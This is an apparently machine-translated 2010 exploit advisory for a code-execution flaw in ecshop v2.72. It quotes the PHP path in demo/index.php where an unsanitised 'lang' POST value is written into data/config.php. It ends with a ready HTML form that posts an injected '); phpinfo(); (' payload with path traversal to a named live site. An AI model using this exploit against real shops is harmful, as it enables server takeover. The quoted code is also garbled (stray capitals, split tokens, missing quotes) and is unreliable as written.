//-------------------------------------------------------------
Release date: 2010-11.26
Author: xhming
Affected Version: ecshop v2.72
Official Address: http://www.ecshop.cn/
Vulnerability Type: Code Execution
Vulnerability description:
Vulnerability Analysis: demo/index. php
{If (! Empty ($ _ POST [lang])
{$ Lang_charset = explode (_, $ _ POST [lang]);
$ Updater_lang = $ lang_charset [0]. _. $ lang_charset [1];
$ Ec_charset = $ lang_charset [2];}
........................................
$ Updater_lang_package_path = ROOT_PATH. demo/ages/. $ updater_lang. _. $ ec_charset.. php;
If (file_exists ($ updater_lang_package_path ))
{Include_once ($ updater_lang_package_path );
$ Smarty-> assign (lang, $ _ LANG );}
Else
{Die (Can find language package !); }/* Initialize the process control variable */
$ Step = isset ($ _ REQUEST [step])? $ _ REQUEST [step]: sel_lang;
$ Smarty-> assign (ec_charset, $ ec_charset );
$ Smarty-> assign (updater_lang, $ updater_lang );
Switch ($ step)
{Case readme: write_charset_config ($ updater_lang, $ ec_charset );
.......................................
Function write_charset_config ($ lang, $ charset)
{$ Config_file = ROOT_PATH. data/config. php;
$ S = file_get_contents ($ config_file );
$ S = insertconfig ($ s, "/?> /","");
$ S = insertconfig ($ s, "/define (EC_LANGUAGE, s *.*?); /I "," define (EC_LANGUAGE, ". $ lang .");");
$ S = insertconfig ($ s, "/define (EC_CHARSET, s *.*?); /I "," define (EC_CHARSET, ". $ charset .");");
$ S = insertconfig ($ s, "/?> /","?> ");
Return file_put_contents ($ config_file, $ s );
Condition for exploits: demo/index. php is required.
EXP:
<Title> ecshop v2.72 front-end shell Write vulnerability by: xhm1large </title>
<Form method = "post" name = "register" action = http://www.4safer.com/demo/index.php>
<H3> ecshop v2.72 front-end shell Write Vulnerability <Input type = "text" name = "lang" size = "80" value = "); phpinfo (); (_ 1 _/.. /.. /.. /index "/>
<Input type = "hidden" name = "step" value = "readme"/>
<Button class = "submit" type = "submit" name = "regsubmit" value = "true"> submit </button>
</Form>